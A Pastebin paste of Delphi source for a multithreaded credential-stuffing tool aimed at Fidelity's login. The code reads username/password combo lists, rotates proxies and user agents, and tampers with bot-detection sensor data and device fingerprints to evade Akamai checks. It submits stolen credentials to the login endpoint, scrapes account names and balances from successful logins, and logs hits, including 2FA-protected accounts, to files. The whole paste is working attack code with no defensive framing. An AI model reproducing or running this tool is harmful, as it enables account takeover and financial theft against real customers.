API tools faq
paste
Advertisement
Guest User

Untitled

a guest
Jan 6th, 2019
209
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 12.49 KB | None | 0 0
raw download clone embed print report
  1. unit BruteAppThread;
  2.  
  3. interface
  4.  
  5. uses
  6. System.Classes, SyncObjs, VCL.Dialogs, synachar, ssl_openssl, Math,
  7. httpsend, synautil, synsock, blcksock, SysUtils, RegExpr;
  8.  
  9. type
  10. TManualThread = class(TThread)
  11. strict private
  12. HTTP: THTTPSend;
  13. Pagedata: TStringList;
  14. JSON: TStringStream;
  15. PKId, URLText, Bio, UserName, Password, DeviceSign, send_timezone,
  16. send_height, send_width, send_availHeight, send_AppVersion, Send_productSub,
  17. DevicePrint, UserCheck: String;
  18.  
  19. Reg: TRegExpr;
  20.  
  21.  
  22. procedure DelimitUser(Str: string; out User, Pass: string);
  23. protected
  24. fAcc, fProxy, ThreadResult: Integer;
  25. fPrAddr, fPrPort: string;
  26. function WorkingThread: Boolean;
  27. procedure Execute; override;
  28. procedure MakeSomeRandomError;
  29. procedure Sync;
  30. end;
  31.  
  32. implementation
  33.  
  34. uses BruteAppUnit;
  35.  
  36. procedure TManualThread.DelimitUser(Str: string; out User, Pass: string);
  37. begin
  38. if Pos(';', Str) <> 0 then
  39. begin
  40. User := Copy(Str, 1, Pos(';', Str) - 1);
  41. Pass := Copy(Str, Pos(';', Str) + 1, Length(Str));
  42. end
  43. else
  44. begin
  45. User := Copy(Str, 1, Pos(':', Str) - 1);
  46. Pass := Copy(Str, Pos(':', Str) + 1, Length(Str));
  47. end;
  48.  
  49. if Pos('@', User) <> 0 then User := Copy(User, 1, Pos('@', User) - 1);
  50. end;
  51.  
  52. procedure TManualThread.Execute;
  53. var
  54. fBool: Boolean;
  55. begin
  56. while Working do
  57. begin
  58. CS.Enter;
  59. Inc(Acc);
  60. if AccountList.Count -1 <= Acc then Working := False else fAcc := Acc;
  61. CS.Leave;
  62.  
  63. if Working then
  64. begin
  65. HTTP := THTTPSend.Create;
  66. Pagedata := TStringList.Create;
  67. JSON := TStringStream.Create;
  68.  
  69. DelimitUser(AccountList[fAcc], UserName, Password);
  70. Reg := TRegExpr.Create;
  71. UserCheck := '';
  72.  
  73. if (Length(UserName) >= 5) and (Password <> '') then
  74. begin
  75. repeat
  76. fBool := WorkingThread;
  77. until fBool;
  78. end
  79. else ThreadResult := 2;
  80.  
  81. Synchronize(Sync);
  82.  
  83. Reg.Free;
  84. HTTP.Free;
  85. Pagedata.Free;
  86. JSON.Free;
  87. end;
  88. end;
  89. end;
  90.  
  91. procedure TManualThread.MakeSomeRandomError;
  92. begin
  93. CS.Enter;
  94. Inc(Help.ConnectError);
  95. CS.Leave;
  96. end;
  97.  
  98. procedure TManualThread.Sync;
  99. begin
  100. case ThreadResult of
  101. 1: begin
  102. Inc(Help.Good);
  103.  
  104. Append(GoodFile);
  105. Writeln(GoodFile, UserName + ';' + Password);
  106. Writeln(GoodFile, UserCheck);
  107. Writeln(GoodFile, '******************************************');
  108. CloseFile(GoodFile);
  109.  
  110. Item := BruteAppForm.ResultList.Items.Add;
  111. Item.Caption := UserName;
  112. Item.SubItems.Add(Password);
  113. end;
  114. 2: begin
  115. Inc(Help.Bad);
  116. Append(BadFile);
  117. Writeln(BadFile, UserName + ';' + Password);
  118. CloseFile(BadFile);
  119. end;
  120. 3: begin
  121. Inc(Help.Good2FA);
  122. Append(SecurityFile);
  123. Writeln(SecurityFile, UserName + ';' + Password);
  124. CloseFile(SecurityFile);
  125. end;
  126. end;
  127. end;
  128.  
  129. function URLDecode(Str: String): String;
  130. var
  131. DynStr: String;
  132. begin
  133. DynStr := Str;
  134. DynStr := StringReplace(DynStr, '!', '%21', [rfReplaceAll]);
  135. DynStr := StringReplace(DynStr, '#', '%23', [rfReplaceAll]);
  136. DynStr := StringReplace(DynStr, '$', '%24', [rfReplaceAll]);
  137. DynStr := StringReplace(DynStr, '&', '%26', [rfReplaceAll]);
  138. DynStr := StringReplace(DynStr, #39, '%27', [rfReplaceAll]);
  139. DynStr := StringReplace(DynStr, '*', '%2A', [rfReplaceAll]);
  140. DynStr := StringReplace(DynStr, '+', '%2B', [rfReplaceAll]);
  141. DynStr := StringReplace(DynStr, ',', '%2C', [rfReplaceAll]);
  142. DynStr := StringReplace(DynStr, '/', '%2F', [rfReplaceAll]);
  143. DynStr := StringReplace(DynStr, ':', '%3A', [rfReplaceAll]);
  144. DynStr := StringReplace(DynStr, ';', '%3B', [rfReplaceAll]);
  145. DynStr := StringReplace(DynStr, '=', '%3D', [rfReplaceAll]);
  146. DynStr := StringReplace(DynStr, '?', '%3F', [rfReplaceAll]);
  147. DynStr := StringReplace(DynStr, '@', '%40', [rfReplaceAll]);
  148. DynStr := StringReplace(DynStr, '[', '%5B', [rfReplaceAll]);
  149. DynStr := StringReplace(DynStr, ']', '%5D', [rfReplaceAll]);
  150. DynStr := StringReplace(DynStr, '{', '%7B', [rfReplaceAll]);
  151. DynStr := StringReplace(DynStr, '"', '%22', [rfReplaceAll]);
  152. DynStr := StringReplace(DynStr, '}', '%7D', [rfReplaceAll]);
  153. DynStr := StringReplace(DynStr, ' ', '%20', [rfReplaceAll]);
  154. DynStr := StringReplace(DynStr, '\', '%5C', [rfReplaceAll]);
  155.  
  156. Result := DynStr;
  157. end;
  158.  
  159. function TManualThread.WorkingThread: Boolean;
  160. var
  161. RandomArrInd, I: Integer;
  162. Sensor, Cook: String;
  163. begin
  164. JSON.Clear;
  165. Pagedata.Clear;
  166. HTTP.Document.Clear;
  167. HTTP.Cookies.Clear;
  168. HTTP.Headers.Clear;
  169.  
  170. CS.Enter;
  171. Inc(Proxy); if ProxyList.Count -1 <= Proxy then Proxy := 0; fProxy := Proxy;
  172. CS.Leave;
  173.  
  174. fPrAddr := Copy(ProxyList[fProxy], 1, Pos(':', ProxyList[fProxy]) - 1);
  175. fPrPort := Copy(ProxyList[fProxy], Pos(':', ProxyList[fProxy]) + 1, Length(ProxyList[fProxy]));
  176.  
  177. if fProxyType = 0 then
  178. begin
  179. HTTP.ProxyHost := fPrAddr;
  180. HTTP.ProxyPort := fPrPort;
  181. end
  182. else if fProxyType = 1 then
  183. begin
  184. HTTP.Sock.SocksIP := fPrAddr;
  185. HTTP.Sock.SocksPort := fPrPort;
  186. HTTP.Sock.SocksResolver := False;
  187. HTTP.Sock.SocksType := ST_Socks4;
  188. end
  189. else
  190. begin
  191. HTTP.Sock.SocksIP := fPrAddr;
  192. HTTP.Sock.SocksPort := fPrPort;
  193. HTTP.Sock.SocksResolver := False;
  194. HTTP.Sock.SocksType := ST_Socks5;
  195. end;
  196.  
  197. HTTP.AddPortNumberToHost := False;
  198. HTTP.Protocol := '1.1';
  199. RandomArrInd := Random(15);
  200. HTTP.UserAgent := UserAgents[Random(35)][0];
  201.  
  202. HTTP.Headers.Add('Purpose:prefetch');
  203. HTTP.Headers.Add('Upgrade-Insecure-Requests:1');
  204. HTTP.Headers.Add('Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8');
  205.  
  206. if (HTTP.HTTPMethod('GET', 'https://www.fidelity.com/')) and (HTTP.ResultCode = 200) then
  207. begin
  208. HTTP.Headers.Clear;
  209. HTTP.Document.Clear;
  210.  
  211. (* HTTP.Headers.Add('Accept:*/*');
  212. HTTP.Headers.Add('Referer:https://www.fidelity.com/');
  213. HTTP.HTTPMethod('GET', 'https://www.fidelity.com/_bm/bd-1-30');
  214.  
  215. HTTP.Headers.Clear;
  216. HTTP.Document.Clear;
  217.  
  218. HTTP.Headers.Clear;
  219. HTTP.Document.Clear;
  220.  
  221. HTTP.Headers.Add('Accept:*/*');
  222. HTTP.Headers.Add('Referer:https://www.fidelity.com/');
  223. HTTP.HTTPMethod('GET', 'https://dpesb.fidelity.com/ftgw/dpdirect/measurement/visitoridentification/v1'); *)
  224.  
  225.  
  226.  
  227. HTTP.ProxyHost := '';
  228. HTTP.ProxyPort := '';
  229. HTTP.Sock.SocksIP := '';
  230. HTTP.Sock.SocksPort := '';
  231.  
  232. HTTP.Headers.Clear;
  233. HTTP.Document.Clear;
  234.  
  235. try
  236. for RandomArrInd := 0 to HTTP.Cookies.Count - 1 do
  237. begin
  238. if Cook <> '' then Cook := Cook + '&';
  239.  
  240. Cook := Cook + 'cookie' + IntToStr(RandomArrInd) + '=' + URLDecode(HTTP.Cookies[RandomArrInd]);
  241. end;
  242.  
  243. JSON.WriteString(Cook);
  244.  
  245. except
  246.  
  247. end;
  248.  
  249. HTTP.Document.LoadFromStream(JSOn);
  250. HTTP.MimeType := 'application/x-www-form-urlencoded';
  251. if HTTP.HTTPMethod('POST', 'http://localhost:80/fidelity') then
  252. begin
  253. Pagedata.LoadFromStream(HTTP.Document);
  254. Sensor := Help.Pars('"sensor_data":"', Pagedata.Text, '"}');
  255. Sensor := StringReplace(Sensor, '2883', '12147', [rfReplaceAll]);
  256.  
  257. Sensor := StringReplace(Sensor, 'cwen:0', 'cwen:1', [rfReplaceAll]);
  258. Sensor := StringReplace(Sensor, 'wrc:0', 'wrc:1', [rfReplaceAll]);
  259. Sensor := StringReplace(Sensor, 'vib:0', 'vib:1', [rfReplaceAll]);
  260. Sensor := StringReplace(Sensor, 'bat:0', 'bat:1', [rfReplaceAll]);
  261. Sensor := StringReplace(Sensor, 'do_dis', 'do_en', [rfReplaceAll]);
  262. Sensor := StringReplace(Sensor, 'dm_dis', 'dm_en', [rfReplaceAll]);
  263.  
  264. Sensor := StringReplace(Sensor, 'Gecko,-1', 'Gecko,3', [rfReplaceAll]);
  265. end;
  266.  
  267.  
  268. if fProxyType = 0 then
  269. begin
  270. HTTP.ProxyHost := fPrAddr;
  271. HTTP.ProxyPort := fPrPort;
  272. end
  273. else if fProxyType = 1 then
  274. begin
  275. HTTP.Sock.SocksIP := fPrAddr;
  276. HTTP.Sock.SocksPort := fPrPort;
  277. HTTP.Sock.SocksResolver := False;
  278. HTTP.Sock.SocksType := ST_Socks4;
  279. end
  280. else
  281. begin
  282. HTTP.Sock.SocksIP := fPrAddr;
  283. HTTP.Sock.SocksPort := fPrPort;
  284. HTTP.Sock.SocksResolver := False;
  285. HTTP.Sock.SocksType := ST_Socks5;
  286. end;
  287.  
  288. HTTP.Headers.Clear;
  289. HTTP.Document.Clear;
  290. JSON.Clear;
  291.  
  292.  
  293. HTTP.Cookies.Add('ia=1');
  294.  
  295. JSON.WriteString('{"sensor_data":"' + Sensor + '"}');
  296. HTTP.Headers.Clear;
  297. HTTP.Document.Clear;
  298.  
  299.  
  300.  
  301.  
  302.  
  303. if BruteAppForm.sCheckBox1.Checked then
  304. begin
  305. HTTP.Cookies.Add(BruteAppForm.sEdit1.Text);
  306. JSON.Clear;
  307. JSON.WriteString(BruteAppForm.sEdit1.Text);
  308. end;
  309.  
  310. HTTP.Document.LoadFromStream(JSON);
  311.  
  312.  
  313. HTTP.MimeType := 'text/plain;charset=UTF-8';
  314. HTTP.Headers.Add('Accept:*/*');
  315. HTTP.Headers.Add('Referer:https://www.fidelity.com/');
  316. HTTP.Headers.Add('Accept-Language:en-US,en;q=0.9');
  317. HTTP.KeepAliveTimeout := 0;
  318.  
  319.  
  320. if HTTP.HTTPMethod('POST', 'https://www.fidelity.com/_bm/_data') then
  321. begin
  322.  
  323. if Pos('_abck=', HTTP.Headers.Text) <> 0 then
  324. begin
  325. Result := True;
  326. ThreadResult := 1;
  327.  
  328. HTTP.Headers.Clear;
  329. HTTP.Document.Clear;
  330.  
  331. if HTTP.HTTPMethod('GET', 'https://login.fidelity.com/ftgw/Fas/Fidelity/RtlCust/Login/Init/dj.chf.ra?AuthRedUrl=https%3A%2F%2Foltx.fidelity.com%2Fftgw%2Ffbc%2Fofsummary%2FdefaultPage&AuthOrigUrl=&errorpage=%2Flogin%2FerrorPages%2FaccountErrorPage') then
  332. begin
  333. HTTP.Headers.Clear;
  334. HTTp.Document.Clear;
  335.  
  336.  
  337. DevicePrint := 'version=3.5.2_2&pm_fpua=' + LowerCase(HTTP.UserAgent) + '|' + send_AppVersion + ' |Win32&pm_fpsc=24'+
  338. '|' + Windows[RandomArrInd][0] + '|' + Windows[RandomArrInd][1] + '|' + Windows[RandomArrInd][2] + '&pm_fpsw=&pm_fptz=-8&pm_fpln=lang=en-US|syslang=|userlang=&pm_fpjv=0&pm_fpco=1'+
  339. '&pm_fpasw=internal-pdf-viewer|mhjfbmdgcfjbbpaeojofohoefgiehjai|internal-nacl-plugin&pm_fpan=Netscape&pm_fpacn=Mozilla&pm_fpol=true&pm_fposp=&pm_fpup=&pm_fpsaw=' + Windows[RandomArrInd][0] + '&pm_fpspd=24&pm_fpsbd=&pm_fpsdx='+
  340. '&pm_fpsdy=&pm_fpslx=&pm_fpsly=&pm_fpsfse=&pm_fpsui=&pm_os=Windows&pm_brmjv=' + Help.Pars('Chrome/', HTTP.UserAgent, '.') + '&pm_br=Chrome&pm_inpt=&pm_expt=';
  341.  
  342. JSOn.Clear;
  343. JSON.WriteString('DEVICE_PRINT=' + Help.URLDecode(DevicePrint) + '&SSN=' + Username + '&SavedIdInd=N&PIN=' + Password);
  344.  
  345. HTTP.Document.LoadFromStream(JSON);
  346.  
  347. HTTP.Headers.Add('Accept:application/json, text/javascript, */*; q=0.01');
  348. HTTP.MimeType := 'application/x-www-form-urlencoded; charset=UTF-8';
  349. HTTP.Headers.Add('Referer:https://www.fidelity.com/');
  350.  
  351.  
  352.  
  353. if HTTP.HTTPMethod('POST', 'https://login.fidelity.com/ftgw/Fas/Fidelity/RtlCust/Login/Response/dj.chf.ra?AuthRedUrl=https%3A%2F%2Foltx.fidelity.com%2Fftgw%2Ffbc%2Fofsummary%2FdefaultPage&AuthOrigUrl=&errorpage=%2Flogin%2FerrorPages%2FaccountErrorPage') then
  354. begin
  355. Pagedata.LoadFromStream(HTTP.Document);
  356.  
  357. if Pos('"result": "success"', Pagedata.Text) <> 0 then
  358. begin
  359. Result := True;
  360. ThreadResult := 1;
  361.  
  362. HTTP.Headers.Clear;
  363. HTTP.Document.Clear;
  364. Pagedata.Clear;
  365.  
  366. if HTTP.HTTPMethod('GET', 'https://oltx.fidelity.com/ftgw/fbc/oftop/portfolio#summary') then
  367. begin
  368. Pagedata.LoadFromStream(HTTP.Document);
  369.  
  370. Reg.Expression := 'js-account"(.*?)data-today-change-pct-value="">';
  371.  
  372. if Reg.Exec(Pagedata.Text) then
  373. repeat
  374. if UserCheck <> '' then UserCheck := UserCheck + #13#10;
  375. UserCheck := UserCheck + Trim(Help.Pars('account-name" data-pii="true">', Reg.Match[1], '<')) + ' ' + Trim(Help.Pars('js-acct-balance">', Reg.Match[1], '<'));
  376. until not Reg.ExecNext;
  377. end;
  378. end
  379. else if Pos('<title>We are Sorry. There was a Technical Issue.</title>', Pagedata.Text) <> 0 then
  380. begin
  381. MakeSomeRandomError;
  382. Result := False;
  383. ThreadResult := 0;
  384. end else if Pos('Error:</strong> The username', Pagedata.Text) <> 0 then
  385.  
  386. begin
  387. Result := True;
  388. ThreadResult := 2;
  389. end;
  390. end
  391. else MakeSomeRandomError;
  392.  
  393.  
  394. end
  395. else MakeSomeRandomError;
  396.  
  397. end else begin
  398. CS.Enter;
  399. Inc(help.InternalErrors);
  400. CS.Leave;
  401. end;
  402.  
  403. end
  404. else MakeSomeRandomError;
  405. end
  406. else MakeSomeRandomError;
  407. end;
  408.  
  409. end.
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!